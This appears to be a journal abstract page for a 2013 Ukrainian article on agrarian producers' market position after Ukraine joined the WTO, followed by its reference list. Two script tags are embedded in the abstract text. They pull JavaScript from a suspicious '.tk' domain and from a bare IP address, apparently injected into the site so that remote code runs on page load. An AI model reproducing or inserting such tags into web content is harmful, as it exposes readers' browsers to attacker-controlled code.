ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 338.439.5
Аграрний ринок

The role of national agrarian producers within the context of WTO membership of Ukraine / Kozak L.V. // Ekonomika APK. - 2013. - № 1 - P. 55

An article provides a study of market position of national agrarian and industrial producers before and after Ukraine's entering WTO. The data of foreign trade turnover of different products shows the level of competitiveness of national AIC. Tabl.: 2. Figs: 4. Refs: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: market relations, foreign trade turnover, competitiveness, export, import

References

  1. Глобальна продовольча безпека / [О.Г. Білорус, М.В. Зубець, П.Т. Саблук, І.В. Власов]. - К: ННЦ «ІАЕ», 2009. - 486 с.
  2. Єранкін О.О. Маркетинг в АПК України в умовах глобалізації: монографія / О. О. Єранкін. - К. : КНЕУ, 2009. - 419 с.
  3. Кьостер У. Основи аналізу аграрного ринку / У. Кьостер; наук. ред. пер. О.Нів'євський. - К.: Видавництво АДЕФ-Україна, 2012. - 486 с.
  4. Осташко Т.О. Внутрішній агропродовольчий ринок України в умовах COT / Осташко Т.О., Волощенко Л.Ю., Лєнівова Г.В.; відпов. ред. д-р екон. наук, проф. В.О.Точилін. - К.: Ін-т економіки та прогнозування HAH України, 2010. - 208 с.
  5. Система організаційно-економічних механізмів функціонування основних агропродовольчих підкомилексів рослинництва України / [О.М. Шпичак, О.В. Бондар, І.В. Кобута]; за ред. акад.. УААН О.М. Шпичака. - К.: ЗАТ «Нічлава», 2009. - 406 с.
  6. Статистика сільського господарства та навколишнього середовища: електронні публікації Державної служби статистики України [Електронний ресурс] / Реалізація продукції сільськогосподарськими підприємствами за 2011рік / Стат. бюл. - К.: Державна служба статистики України, 2012. - 110 с. - Режим доступу: http://ukrstat.org/menu/publikac_r.htm.
  7. Сумарний обсяг імпорту та експорту окремих підгруп товарів за кодами УКТЗЕД: електронні публікації Державної митної служби України [Електронний ресурс]/ Назва з титул. екрана. - Режим доступу: http://www.customs.gov.ua/dmsu/control/cstat.
  8. OECD.Stat Extracts: електронні публікації Organization for Economic Cooperation and Development [Електронний ресурс] / Назва з титул. екрану. - Режим доступу: http://www.oecd.org/statistics.
Read article: 13_01_08.pdf